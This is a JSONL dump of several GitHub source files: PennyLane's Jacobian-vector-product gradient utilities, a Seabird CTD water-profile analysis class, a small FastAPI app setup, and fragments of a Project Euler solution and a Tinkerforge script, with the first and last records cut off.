= []\r\n n = 100\r\n for a in range(2,n+1):\r\n for b in range(2,n+1):\r\n outcome = math.pow(a,b)\r\n if not outcome in outcomes:\r\n outcomes.append(outcome)\r\n outcomes = sorted(outcomes)\r\n print(len(outcomes), outcomes)","repo_name":"dominic-lam/project_relue","sub_path":"problem_029.py","file_name":"problem_029.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31503893252","text":"import numpy as np\n\nimport pennylane as qml\nfrom pennylane.measurements import ProbabilityMP\n\n\ndef compute_jvp_single(tangent, jac):\n r\"\"\"Convenience function to compute the Jacobian vector 
product for a given\n tangent vector and a Jacobian for a single measurement tape.\n\n Args:\n tangent (list, tensor_like): tangent vector\n jac (tensor_like, tuple): Jacobian matrix\n\n Returns:\n tensor_like: the Jacobian vector product\n\n **Examples**\n\n We start with a number of examples. A more complete, technical description is given\n further below.\n\n 1. For a single parameter and a single measurement without shape (e.g. ``expval``, ``var``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0])\n >>> jac = np.array(0.2)\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array(0.2)\n\n 2. For a single parameter and a single measurement with shape (e.g. ``probs``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([2.0])\n >>> jac = np.array([0.3, 0.4])\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array([0.6, 0.8])\n\n 3. For multiple parameters (in this case 2 parameters) and a single measurement\n without shape (e.g. ``expval``, ``var``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0, 2.0])\n >>> jac = tuple([np.array(0.1), np.array(0.2)])\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array(0.5)\n\n 4. For multiple parameters (in this case 2 parameters) and a single measurement with\n shape (e.g. ``probs``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0, 0.5])\n >>> jac = tuple([np.array([0.1, 0.3]), np.array([0.2, 0.4])])\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array([0.2, 0.5])\n\n .. details::\n :title: Technical description\n :href: technical-description\n\n There are multiple case distinctions in this function, for particular examples see above.\n\n - The JVP may be for one **(A)** or multiple **(B)** parameters. We call the number of\n parameters ``k``\n\n - The number ``R`` of tape return type dimensions may be between 0 and 3.\n We call the return type dimensions ``r_j``\n\n - Each parameter may have an arbitrary number ``L_i>=0`` of dimensions\n\n In the following, ``(a, b)`` denotes a tensor_like of shape ``(a, b)`` and ``[(a,), (b,)]``\n / ``((a,), (b,))`` denotes a ``list`` / ``tuple`` of tensors with the indicated shapes,\n respectively. Ignore the case of no trainable parameters, as it is filtered out in advance.\n\n For scenario **(A)**, the input shapes can be in\n\n .. list-table::\n :widths: 30 40 30\n :header-rows: 1\n\n * - ``tangent`` shape\n - ``jac`` shape\n - Comment\n * - ``(1,)`` or ``[()]`` or ``(())``\n - ``()``\n - scalar return, scalar parameter\n * - ``(1,)`` or ``[()]`` or ``(())``\n - ``(r_1,..,r_R)``\n - tensor return, scalar parameter\n * - ``[(l_1,..,l_{L_1})]`` [1]\n - ``(l_1,..,l_{L_1})``\n - scalar return, tensor parameter\n * - ``[(l_1,..,l_{L_1})]`` [1]\n - ``(r_1,..,r_R, l_1,..,l_{L_1})``\n - tensor return, tensor parameter\n\n [1] Note that intuitively, ``tangent`` could be allowed to be a tensor of shape\n ``(l_1,..,l_{L_1})`` without an outer list. However, this is excluded in order\n to allow for the distinction from scenario **(B)**. Internally, this input shape for\n ``tangent`` never occurs for scenario **(A)**.\n\n In this scenario, the tangent is reshaped into a one-dimensional tensor with shape\n ``(tangent_size,)`` and the Jacobian is reshaped to have the dimensions\n ``(r_1, ... r_R, tangent_size)``. This is followed by a ``tensordot`` contraction over the\n ``tangent_size`` axis of both tensors.\n\n For scenario **(B)**, the input shapes can be in\n\n .. 
list-table::\n :widths: 30 40 30\n :header-rows: 1\n\n * - ``tangent`` shape\n - ``jac`` shape\n - Comment\n * - ``(k,)`` or ``[(),..,()]`` or ``((),..,())``\n - ``((),..,())`` (length ``k``)\n - scalar return, ``k`` scalar parameters\n * - ``(k,)`` or ``[(),..,()]`` or ``((),..,())``\n - ``((r_1,..,r_R),..,(r_1,..,r_R))`` [1]\n - tensor return, ``k`` scalar parameters\n * - ``[(l_1,..,l_{L_1}),..,(l_1,..,l_{L_k})]``\n - ``((l_1,..,l_{L_1}),..,(l_1,..,l_{L_k}))``\n - scalar return, ``k`` tensor parameters\n * - ``[(l_1,..,l_{L_1}),..,(l_1,..,l_{L_k})]``\n - ``((r_1,..,r_R, l_1,..,l_{L_1}),..,(r_1,..,r_R, l_1,..,l_{L_k}))`` [1]\n - tensor return, ``k`` tensor parameters\n\n [1] Note that the return type dimensions ``(r_1,..,r_R)`` are the same for all entries\n of ``jac``, whereas the dimensions of the entries in ``tanget``, and the according\n dimensions ``(l_1,..,l_{L_k})`` of the ``jac`` entries may differ.\n\n In this scenario, another case separation is used: If any of the parameters is a\n tensor (i.e. not a scalar), all tangent entries are reshaped into one-dimensional\n tensors with shapes ``(tangent_size_i,)`` and then stacked into one one-dimensional tensor.\n If there are no tensor parameters, the tangent is just stacked and reshaped.\n The Jacobians are reshaped to have the dimensions ``(r_1, ... r_R, tangent_size_i)``\n and then are concatenated along their last (potentially mismatching) axis.\n This is followed by a tensordot contraction over the axes of size\n :math:`\\sum_i` ``tangent_size_i``.\n\n \"\"\"\n if jac is None:\n return None\n single_param = not isinstance(jac, tuple)\n if (single_param and jac.shape == (0,)) or (not single_param and len(jac) == 0):\n # No trainable parameters\n return qml.math.zeros((1, 0))\n\n if single_param:\n tangent = qml.math.stack(tangent)\n first_tangent_ndim = len(tangent.shape[1:])\n tangent = qml.math.flatten(tangent)\n tangent_size = tangent.shape[0]\n shape = jac.shape\n new_shape = shape[: len(shape) - first_tangent_ndim] + (tangent_size,)\n jac = qml.math.cast(qml.math.convert_like(jac, tangent), tangent.dtype)\n jac = qml.math.reshape(jac, new_shape)\n return qml.math.tensordot(jac, tangent, [[-1], [0]])\n\n tangent_ndims = [getattr(t, \"ndim\", 0) for t in tangent]\n if isinstance(tangent, (tuple, list)) and any(ndim > 0 for ndim in tangent_ndims):\n # At least one tangent entry is not a scalar, requiring us to flatten them and hstack\n tangent = [qml.math.flatten(t) for t in tangent]\n tangent_sizes = [t.shape[0] for t in tangent]\n tangent = qml.math.hstack(tangent)\n else:\n # Only scalar tangent entries, no flattening required and we may use stack\n tangent_sizes = [1] * len(tangent)\n tangent = qml.math.stack(tangent)\n jac_shapes = [j.shape for j in jac]\n new_shapes = [\n shape[: len(shape) - t_ndim] + (tsize,)\n for shape, t_ndim, tsize in zip(jac_shapes, tangent_ndims, tangent_sizes)\n ]\n jac = qml.math.concatenate([qml.math.reshape(j, s) for j, s in zip(jac, new_shapes)], axis=-1)\n jac = qml.math.cast(qml.math.convert_like(jac, tangent), tangent.dtype)\n return qml.math.tensordot(jac, tangent, [[-1], [0]])\n\n\ndef compute_jvp_multi(tangent, jac):\n \"\"\"Convenience function to compute the Jacobian-vector product for a given\n vector of gradient outputs and a Jacobian for a tape with multiple measurements.\n\n Args:\n tangent (tensor_like, list): tangent vector\n jac (tensor_like, tuple): Jacobian matrix\n\n Returns:\n tensor_like: the Jacobian-vector product\n\n **Examples**\n\n 1. 
For a single parameter and multiple measurements (one without shape and one with shape, e.g. expval and probs):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([2.0])\n >>> jac = tuple([np.array([0.3]), np.array([0.2, 0.5])])\n >>> qml.gradients.compute_jvp_multi(tangent, jac)\n (np.array([0.6]), np.array([0.4, 1. ]))\n\n 2. For multiple parameters (in this case 2 parameters) and multiple measurements (one without shape and one with\n shape, e.g. expval and probs):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0, 2.0])\n >>> jac = tuple([tuple([np.array([0.3]), np.array([0.4])]), tuple([np.array([0.2, 0.5]), np.array([0.3, 0.8])]),])\n >>> qml.gradients.compute_jvp_multi(tangent, jac)\n (np.array([1.1]), np.array([0.8, 2.1]))\n \"\"\"\n if jac is None:\n return None\n return tuple(compute_jvp_single(tangent, j) for j in jac)\n\n\ndef jvp(tape, tangent, gradient_fn, gradient_kwargs=None):\n r\"\"\"Generate the gradient tapes and processing function required to compute\n the Jacobian vector product of a tape. This function only works with the new return type system on.\n\n Args:\n tape (.QuantumTape): quantum tape to differentiate\n tangent (tensor_like, list): Gradient-output vector. Must have shape\n matching the number of trainable parameters.\n gradient_fn (callable): the gradient transform to use to differentiate\n the tape\n gradient_kwargs (dict): dictionary of keyword arguments to pass when\n determining the gradients of tapes\n\n Returns:\n tensor_like or tuple or None: Jacobian vector product. Returns None if the tape\n has no trainable parameters.\n\n **Example**\n\n Consider the following quantum tape with Jax parameters:\n\n .. code-block:: python\n\n import jax\n\n x = jax.numpy.array([[0.1, 0.2, 0.3],\n [0.4, 0.5, 0.6]])\n\n ops = [\n qml.RX(x[0, 0], wires=0),\n qml.RY(x[0, 1], wires=1),\n qml.RZ(x[0, 2], wires=0),\n qml.CNOT(wires=[0, 1]),\n qml.RX(x[1, 0], wires=1),\n qml.RY(x[1, 1], wires=0),\n qml.RZ(x[1, 2], wires=1)\n ]\n measurements = [qml.expval(qml.PauliZ(0)), qml.probs(wires=1)]\n tape = qml.tape.QuantumTape(ops, measurements)\n\n We can use the ``jvp`` function to compute the Jacobian vector product,\n given a tangent vector ``tangent``:\n\n >>> tangent = [jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0)]\n >>> jvp_tapes, fn = qml.gradients.jvp(tape, tangent, qml.gradients.param_shift)\n\n Note that ``tangent`` has six elements, matching the parameter dimension of the tape.\n\n Executing the JVP tapes, and applying the processing function:\n\n >>> dev = qml.device(\"default.qubit\", wires=2)\n >>> jvp = fn(dev.execute(jvp_tapes))\n >>> jvp\n (Array(-0.62073976, dtype=float32), Array([-0.3259707 , 0.32597077], dtype=float32))\n \"\"\"\n if len(tape.trainable_params) == 0:\n # The tape has no trainable parameters; the JVP\n # is simply none.\n return [], lambda _, num=None: None\n\n multi_m = len(tape.measurements) > 1\n\n try:\n # if qml.math.allclose(qml.math.stack(tangent), 0):\n if qml.math.allclose(tangent, 0):\n # If the tangent vector is zero, then the\n # corresponding element of the JVP will be zero,\n # and we can avoid a quantum computation.\n\n def func(_): # pylint: disable=unused-argument\n # TODO: Update shape for CV variables and for qutrit simulations\n res = tuple(_single_measurement_zero(m, tangent) for m in tape.measurements)\n if not multi_m:\n res = res[0]\n return res\n\n return [], func\n except (AttributeError, TypeError):\n pass\n\n 
gradient_kwargs = gradient_kwargs or {}\n gradient_tapes, fn = gradient_fn(tape, **gradient_kwargs)\n\n def processing_fn(results):\n # postprocess results to compute the Jacobian\n jac = fn(results)\n _jvp_fn = compute_jvp_multi if multi_m else compute_jvp_single\n\n # Jacobian without shot vectors\n if not tape.shots.has_partitioned_shots:\n return _jvp_fn(tangent, jac)\n\n # The jacobian is calculated for shot vectors\n return tuple(_jvp_fn(tangent, jac[i]) for i in range(tape.shots.num_copies))\n\n return gradient_tapes, processing_fn\n\n\ndef batch_jvp(tapes, tangents, gradient_fn, reduction=\"append\", gradient_kwargs=None):\n r\"\"\"Generate the gradient tapes and processing function required to compute\n the Jacobian vector products of a batch of tapes.\n\n Args:\n tapes (Sequence[.QuantumTape]): sequence of quantum tapes to differentiate\n tangents (Sequence[tensor_like]): Sequence of gradient-output vectors ``dy``. Must be the\n same length as ``tapes``. Each ``dy`` tensor should have shape\n matching the output shape of the corresponding tape.\n gradient_fn (callable): the gradient transform to use to differentiate\n the tapes\n reduction (str): Determines how the Jacobian-vector products are returned.\n If ``append``, then the output of the function will be of the form\n ``List[tensor_like]``, with each element corresponding to the JVP of each\n input tape. If ``extend``, then the output JVPs will be concatenated.\n gradient_kwargs (dict): dictionary of keyword arguments to pass when\n determining the gradients of tapes\n\n Returns:\n List[tensor_like or None]: list of Jacobian vector products. ``None`` elements corresponds\n to tapes with no trainable parameters.\n\n **Example**\n\n .. code-block:: python\n\n import jax\n x = jax.numpy.array([[0.1, 0.2, 0.3],\n [0.4, 0.5, 0.6]])\n\n ops = [\n qml.RX(x[0, 0], wires=0),\n qml.RY(x[0, 1], wires=1),\n qml.RZ(x[0, 2], wires=0),\n qml.CNOT(wires=[0, 1]),\n qml.RX(x[1, 0], wires=1),\n qml.RY(x[1, 1], wires=0),\n qml.RZ(x[1, 2], wires=1)\n ]\n measurements1 = [qml.expval(qml.PauliZ(0)), qml.probs(wires=1)]\n tape1 = qml.tape.QuantumTape(ops, measurements1)\n\n measurements2 = [qml.expval(qml.PauliZ(0) @ qml.PauliZ(1))]\n tape2 = qml.tape.QuantumTape(ops, measurements2)\n\n tapes = [tape1, tape2]\n\n Both tapes share the same circuit ansatz, but have different measurement outputs.\n\n We can use the ``batch_jvp`` function to compute the Jacobian vector product,\n given a list of tangents ``tangent``:\n\n >>> tangent_0 = [jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0)]\n >>> tangent_1 = [jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0)]\n >>> tangents = [tangent_0, tangent_1]\n\n Note that each ``tangents`` has shape matching the parameter dimension of the tape.\n\n Executing the JVP tapes, and applying the processing function:\n\n >>> jvp_tapes, fn = qml.gradients.batch_jvp(tapes, tangents, qml.gradients.param_shift)\n\n >>> dev = qml.device(\"default.qubit\", wires=2)\n >>> jvps = fn(dev.execute(jvp_tapes))\n >>> jvps\n ((Array(-0.62073976, dtype=float32), Array([-0.3259707 , 0.32597077], dtype=float32)), Array(-0.6900841, dtype=float32))\n\n We have two JVPs; one per tape. 
Each one corresponds to the shape of the output of their respective tape.\n \"\"\"\n # pylint: disable=too-many-arguments\n gradient_kwargs = gradient_kwargs or {}\n reshape_info = []\n gradient_tapes = []\n processing_fns = []\n\n # Loop through the tapes and dys vector\n for tape, tangent in zip(tapes, tangents):\n g_tapes, fn = jvp(tape, tangent, gradient_fn, gradient_kwargs)\n\n reshape_info.append(len(g_tapes))\n processing_fns.append(fn)\n gradient_tapes.extend(g_tapes)\n\n def processing_fn(results):\n jvps = []\n start = 0\n\n for t_idx in range(len(tapes)):\n # extract the correct results from the flat list\n res_len = reshape_info[t_idx]\n res_t = results[start : start + res_len]\n start += res_len\n\n # postprocess results to compute the JVP\n jvp_ = processing_fns[t_idx](res_t)\n\n if jvp_ is None:\n if reduction == \"append\":\n jvps.append(None)\n continue\n\n if isinstance(reduction, str):\n getattr(jvps, reduction)(jvp_)\n elif callable(reduction):\n reduction(jvps, jvp_)\n\n return tuple(jvps)\n\n return gradient_tapes, processing_fn\n\n\ndef _single_measurement_zero(m, tangent):\n \"\"\"Aux function to create a zero tensor from a measurement.\"\"\"\n dim = 2 ** len(m.wires) if isinstance(m, ProbabilityMP) else ()\n res = qml.math.convert_like(np.zeros(dim), tangent)\n res = qml.math.cast_like(res, tangent)\n return res\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/gradients/jvp.py","file_name":"jvp.py","file_ext":"py","file_size_in_byte":17262,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"4660991280","text":"\"\"\"\nSeabird Class\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .tools.seabird_preprocessing import preprocessing as seabird_pp\nfrom .tools.seabird_parser import seabird_file_parser\nfrom .thermocline import thermocline\nfrom .deepChlLayers import DCL\n\nclass seabird:\n\tdef __init__(self, config):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tconfig: dictionary, configuration\n\t\t\"\"\"\n\t\tself.data_file = None\n\t\tself.config=config\n\n\t\t# create THM and DCL model\n\t\tself.thermocline = thermocline(config)\n\t\tself.DCL = DCL(config)\n\n\t\t# site information\n\t\tself.time = None\n\t\tself.site = None\n\t\tself.ID = None\n\t\tself.fileId = None # file id\n\n\t\tself.downCastRawData= None\n\t\tself.rawData = None\n\t\tself.cleanData = None\n\t\t\n\t\tself.features = None\n\t\tself.expert = {\"TRM\":None,\"LEP\":None,\"UHY\":None,\"DCL\":None} # expert notes\n\t\t\n\t\tself.saveModel = False\n\t\tself.waterChemistry = {}\n\n\t\t# self.bottleData = None\n\t\t# self.bottleFile = None # maybe useful\n\n\tdef loadData(self,dataFile = None, fileId = None, dbEngine = None, columns = None):\n\t\t\"\"\"\n\t\tLoad data into the Seabird Class\n\t\tArgs:\n\t\t\tdataFile: seabird raw file, cnv or csv file\n\t\t\tfileId: Id in the database, should not used in application\n\t\t\tdbEngine: database engine\n\t\tReturns:\n\n\t\t\"\"\"\n\t\tif fileId is None:\n\t\t\t# read from the seabird raw data.\n\t\t\tparser = seabird_file_parser()\n\t\t\tparser.readFile(dataFile, columns = columns)\n\t\t\tsensorData = parser.sensordata\n\t\t\tself.time = parser.meta[\"systemUpLoadTime\"]\n\t\t\tself.site = parser.meta[\"stationInfered\"]\n\n\t\telse:\n\t\t\tfrom sqlalchemy import create_engine\n\t\t\tif dbEngine is None:\n\t\t\t\tdbEngine = create_engine('mysql+mysqldb://root:XuWenzhaO@localhost/Seabird')\n\t\t\t\n\t\t\tsql_data = \"Select * from summer_data where fileId = 
%d Order By 'index' ASC\" %(fileId)\n\t\t\tsensorData = pd.read_sql_query(sql_data,dbEngine).drop('index',axis = 1)\n\t\t\tsql_meta = \"Select * from summer_meta where fileId = %d\" %(fileId)\n\t\t\tmeta = pd.read_sql_query(sql_meta,dbEngine)\n\t\t\tself.time = meta[\"systemUpLoadTime\"][0]\n\t\t\tself.site = meta[\"stationInfered\"][0]\n\t\t\tself.fileId = fileId\n\t\t\n\t\tself.rawData = sensorData\n\t\n\n\tdef setExpert(self,notes):\n\t\t\"\"\"\n\t\tLoad operator judgements:\n\t\tArgs:\n\t\t\tnotes: a dictionary stored the depth values of keys of TRM, LEP, UHY and DCL\n\t\tReturns:\n\n\t\t\"\"\"\n\t\tself.expert[\"TRM\"] = notes[\"TRM\"]\n\t\tself.expert[\"LEP\"] = notes[\"LEP\"]\n\t\tself.expert[\"UHY\"] = notes[\"UHY\"]\n\t\tself.expert[\"DCL\"] = notes[\"DCL\"]\n\n\tdef updateConfig(self,new_config):\n\t\t\"\"\"\n\t\tFunction to update configuration, useful when users want to change configurations\n\t\tinteractively\n\t\tArgs:\n\t\t\tnew_config: the new configuration dictionary\n\t\t\"\"\"\n\t\tself.config=new_config\n\t\tself.thermocline = thermocline(new_config)\n\t\tself.DCL = DCL(new_config)\n\t\tself.features = None\n\n\tdef preprocessing(self):\n\t\t\"\"\"\n\t\tFunction to do preprocess the data, including separating and smoothing\n\t\t\"\"\"\n\t\tself.downCastRawData, self.cleanData = seabird_pp(self.rawData, self.config[\"Preprocessing\"])\n\t\t\n\n\tdef identify(self,saveModel = True):\n\t\t\"\"\"\n\t\tFunction to identify features of DCL and TRM\n\t\t\"\"\"\n\t\tself.saveModel = saveModel\n\n\t\t# detect TRM features\n\n\t\tTRM_features = self.thermocline.detect(data = self.cleanData[[\"Depth\",\"Temperature\"]],\\\n\t\t saveModel = saveModel)\n\n\t\tif TRM_features[\"LEP_segment\"] is None:\n\t\t\tpeakMinDepth = 0\n\t\t\tpeakUpperDepthBoundary = 0\n\t\telse:\n\t\t\tpeakMinDepth = TRM_features[\"LEP_segment\"]\n\t\t\tpeakUpperDepthBoundary =TRM_features[\"LEP_segment\"]\n\t\t# detect DCL features\n\t\tDCL_features = self.DCL.detect(data = self.cleanData[[\"Depth\",\"Fluorescence\"]],\\\n\t\t\t\t\t\t\t\t\t rawData = self.downCastRawData[[\"Depth\",\"Fluorescence\"]],\\\n\t\t peakMinDepth = peakMinDepth,\\\n\t\t peakUpperDepthBoundary = peakUpperDepthBoundary,\\\n\t\t saveModel = saveModel)\n\n\t\tself.features = TRM_features.copy()\n\t\tself.features.update(DCL_features) # add DCL features\n\n\tdef plot(self, legend=True, pt=None, filename=None,meta=True):\n\t\t\"\"\"\n\t\tFunction to plot the results\n\t\tArgs:\n\t\t\tLegend: whether to plot DCL and TRM features\n\t\t\tpt: the plot canvas\n\t\t\tfilename: the file name plot to be saved. 
None means don't save\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\tif pt is None:\n\t\t\tpt = plt.figure(figsize=(6, 7), dpi=80)\n\n\t\t# plot the depth profile\n\t\tax1 = pt.add_subplot(111) # ax1 is the temperature axis\n\t\tax2 = ax1.twiny()\t# ax2 is the fluorescence axis\n\n\t\t# plot the raw Temperature data\n\t\tax1.plot(self.cleanData.Temperature, -self.cleanData.Depth, \"r\")\n\t\tax1.plot(self.downCastRawData.Temperature, -self.downCastRawData.Depth, \"r--\", alpha=0.5)\n\t\tax1.set_xlabel(\"Temperature (C)\")\n\t\tax1.set_ylabel(\"Depth (m)\")\n\t\tax1.set_ylim((-max(self.cleanData.Depth) - 5, 0))\n\t\t\n\t\tif legend == False: # Don't plot thermocline and DCL identification\n\t\t\tpass\n\n\t\telse:\n\t\t\tcolors = [\"r\",\"b\",\"y\",\"g\"]\n\n\t\t\t# plot the depth of TRM data\n\t\t\tfor i,depth in enumerate([self.features[\"TRM_segment\"],self.features[\"LEP_segment\"],self.features[\"UHY_segment\"]]):\n\t\t\t\tax1.axhline(y = -1*depth if depth is not None else -999,color = colors[i])\n\n\t\t\tif meta:\n\t\t\t\t# plot HMM results for comparison\n\t\t\t\tfor i,depth in enumerate([self.features[\"TRM_HMM\"],self.features[\"LEP_HMM\"],self.features[\"UHY_HMM\"]]):\n\t\t\t\t\tax1.axhline(y = -1*depth if depth is not None else -999,color = colors[i],ls = \":\")\n\n\t\t\t# plot expert judgement\n\t\t\tfor i,depth in enumerate([self.expert[\"TRM\"],self.expert[\"LEP\"],self.expert[\"UHY\"],self.expert[\"DCL\"]]):\n\t\t\t\tax1.axhline(y = -1*depth if depth is not None else -999,color = colors[i],ls=\"--\")\n\n\n\t\t\tif self.saveModel and meta:\n\t\t\t\t# plot all the fitted segments\n\t\t\t\tfor seg in self.thermocline.models[\"segmentation\"].segmentList:\n\t\t\t\t\tax1.plot(seg[0],-np.array(self.cleanData.Depth[seg[1]]))\n\n\t\t\txlimRange = (\n\t\t\t\tnp.percentile(self.downCastRawData[\"Fluorescence\"][self.downCastRawData.Depth > 2],5) * 0.95,\n\t\t\t\tnp.percentile(self.downCastRawData[\"Fluorescence\"][self.downCastRawData.Depth > 2],99) * 1.3)\n\n\t\t\t# plot fluorescence \n\t\t\tif max(xlimRange)>0.01:\n\t\t\t\tax2.set_xlim(xlimRange)\n\t\t\t\tax2.set_xlabel(\"Fluorescence (ug/L)\")\n\t\t\t\tax2.plot(self.cleanData.Fluorescence, -self.cleanData.Depth, \"g\")\n\t\t\t\tax2.plot(self.downCastRawData.Fluorescence, -self.downCastRawData.Depth, \"g--\", alpha=0.5)\n\t\t\t\t\n\t\t\t\tif self.saveModel and meta:\n\t\t\t\t\tmeta_allPeaks = self.DCL.model.allPeaks\n\n\t\t\t\t\tif meta_allPeaks is not None:\n\t\t\t\t\t\tfor i in range(len(meta_allPeaks[\"peakIndex\"])):\n\t\t\t\t\t\t\t# plot the fitted shape\n\t\t\t\t\t\t\tleftShapeFit = meta_allPeaks[\"leftShapeFit\"][i]\n\t\t\t\t\t\t\trightShapeFit = meta_allPeaks[\"rightShapeFit\"][i]\n\n\t\t\t\t\t\t\tpeakIndex = meta_allPeaks[\"peakIndex\"][i]\n\n\t\t\t\t\t\t\tleftShapeIndex = range(peakIndex-len(leftShapeFit)+1,peakIndex+1)\n\t\t\t\t\t\t\trightShapeIndex = range(peakIndex,peakIndex+len(rightShapeFit))\n\t\t\t\t\t\t\tprint(leftShapeIndex)\n\t\t\t\t\t\t\tprint(rightShapeIndex)\n\t\t\t\t\t\t\tax2.plot(leftShapeFit,-self.cleanData.Depth.iloc[leftShapeIndex])\n\t\t\t\t\t\t\tax2.plot(rightShapeFit,-self.cleanData.Depth.iloc[rightShapeIndex])\n\n\t\t\t\t# if detected DCL, plot the depth of the DCL peak\n\t\t\t\tif self.features[\"DCL_depth\"] is not None:\n\t\t\t\t\tax2.axhline(y=-self.features[\"DCL_depth\"],color=\"g\")\n\t\t\t\t\tax2.axhline(y=-self.features[\"DCL_upperDepth_fit\"],color = 
\"g\")\n\t\t\t\t\tax2.axhline(y=-self.features[\"DCL_bottomDepth_fit\"],color = \"g\")\n\t\t\t\t\t# ax2.axhline(y=-self.features[\"DCL_upperDepth_gradient\"],color = \"m\")\n\t\t\t\t\t# ax2.axhline(y=-self.features[\"DCL_bottomDepth_gradient\"],color = \"m\")\n\n\t\tif filename is None:\n\t\t\tpass\n\t\telse:\n\t\t\tplt.savefig(filename)\n\t\t\tplt.close()\n\n\n\tdef plot_all(self, interestVarList=None, fileTitle=None):\n\t\t# Function to plot all water chemistry\n\t\tfrom mpl_toolkits.axes_grid1 import host_subplot\n\t\timport mpl_toolkits.axisartist as AA\n\n\t\t# create a map from water feature to plot line color \n\t\tcol = dict(zip([\"Temperature\", \"DO\", \"Specific_Conductivity\", \"Fluorescence\", \"Beam_Attenuation\", \"Par\"],\n\t\t [\"r\", \"b\", \"y\", \"g\", \"m\", \"k\"]))\n\n\t\tif interestVarList is None:\n\t\t\t# interestVarList = self.cleanData.columns.values\n\t\t\tinterestVarList=[\"Temperature\", \"DO\", \"Specific_Conductivity\", \"Fluorescence\", \"Beam_Attenuation\", \"Par\"]\n\n\t\tplt.figure(figsize=[8, 10])\n\t\thost = host_subplot(111, axes_class=AA.Axes)\n\t\tplt.subplots_adjust(top=0.75, bottom=0.2)\n\n\t\tnum_axis = len(interestVarList) - 1\n\t\toffset = 23\n\n\t\tparList = []\n\n\t\tfor i in range(num_axis):\n\t\t\tpar = host.twiny()\n\t\t\tnew_fixed_axis = par.get_grid_helper().new_fixed_axis\n\t\t\tpar.axis[\"top\"] = new_fixed_axis(loc=\"top\", axes=par, offset=(0, offset))\n\t\t\tpar.axis[\"top\"].toggle(all=True)\n\t\t\tparList.append(par)\n\t\t\toffset += 35\n\n\t\tp0, = host.plot(self.downCastRawData.Temperature, -self.downCastRawData.Depth, col[\"Temperature\"] + \"+-\", label=\"Temperature\")\n\n\t\tfor index, var in enumerate(interestVarList[1:]):\n\t\t\tpar = parList[index]\n\t\t\tp, = par.plot(self.downCastRawData[var], -self.downCastRawData.Depth, col[var] + \"+-\",\n\t\t\t label=var)\n\t\t\tpar.set_xlabel(var)\n\t\t\tpar.set_xlim(\n\t\t\t\t(np.percentile(self.downCastRawData[var][(self.downCastRawData.Depth > 3)], 5) * 0.95 \n\t\t\t\t ,\n\t\t\t\t np.percentile(self.downCastRawData[var][(self.downCastRawData.Depth > 3)], 95) * 1.05 * 2))\n\n\t\t\tpar.axis[\"top\"].label.set_color(p.get_color())\n\n\t\thost.legend(bbox_to_anchor=(0., -0.27, 1., 0), loc=8, borderaxespad=0.6, ncol=2, mode=\"expand\")\n\t\thost.axis[\"bottom\"].label.set_color(p0.get_color())\n\n\t\thost.set_xlabel(\"Temperature\")\n\t\thost.set_ylabel(\"Depth (m)\")\n\t\t# host.set_title(self.site + \"_\" + self.time)\n\t\thost.set_xlim((max(host.get_xlim()[0], 0), host.get_xlim()[1]))\n\t\thost.set_ylim((host.get_ylim()[0], min(host.get_ylim()[1], 0),))\n\t\tif fileTitle is None:\n\t\t\tplt.show()\n\t\telse:\n\t\t\tplt.draw()\n\t\t\tplt.savefig(fileTitle)","repo_name":"stormxuwz/SeabirdCode","sub_path":"seabird/seabird_class.py","file_name":"seabird_class.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"2013972099","text":"import asyncio\nimport signal\nfrom contextlib import asynccontextmanager\n\nfrom fastapi import FastAPI\nfrom fastapi.middleware import Middleware\n\nfrom internal.pkg.event_loop import EventLoop\nfrom internal.user_interface.restapi import middleware\nfrom internal.user_interface.restapi.controller import healthz\n\n\nclass RestAPI:\n def create_app(self):\n app = FastAPI(\n lifespan=self._lifespan,\n middleware=[\n Middleware(middleware.Logger),\n ],\n )\n\n app.include_router(healthz.router)\n\n return app\n\n @asynccontextmanager\n async def 
_lifespan(self, app: FastAPI):\n        # Startup\n        app.state.event_loop = EventLoop(\n            startup=[],\n            shutdown=[],\n            closed=[self._raise_sigint],\n        )\n        app.state.event_loop.start()\n\n        try:\n            yield\n        except asyncio.CancelledError:\n            pass\n        finally:\n            # Shutdown\n            app.state.event_loop.close()\n\n    @staticmethod\n    def _raise_sigint():\n        signal.raise_signal(signal.SIGINT)\n","repo_name":"hhk7734/fastapi_test.py","sub_path":"internal/user_interface/restapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41312956637","text":"#!/usr/bin/env python3\n\nfrom zipfile import ZipFile\nimport sys\nimport time\nimport traceback\n\ntry:\n    from .tinkerforge.ip_connection import IPConnection\n    from .tinkerforge.bricklet_unknown import BrickletUnknown\n    from .tinkerforge.brick_master import BrickMaster\nexcept ImportError:\n    from tinkerforge.ip_connection import IPConnection\n    from tinkerforge.bricklet_unknown import BrickletUnknown\n    from tinkerforge.brick_master import BrickMaster\n\nfound_uid = None\ndef cb_enumerate(uid, connected_uid, position, hardware_version, firmware_version, device_identifier, enumeration_type):\n    # search for 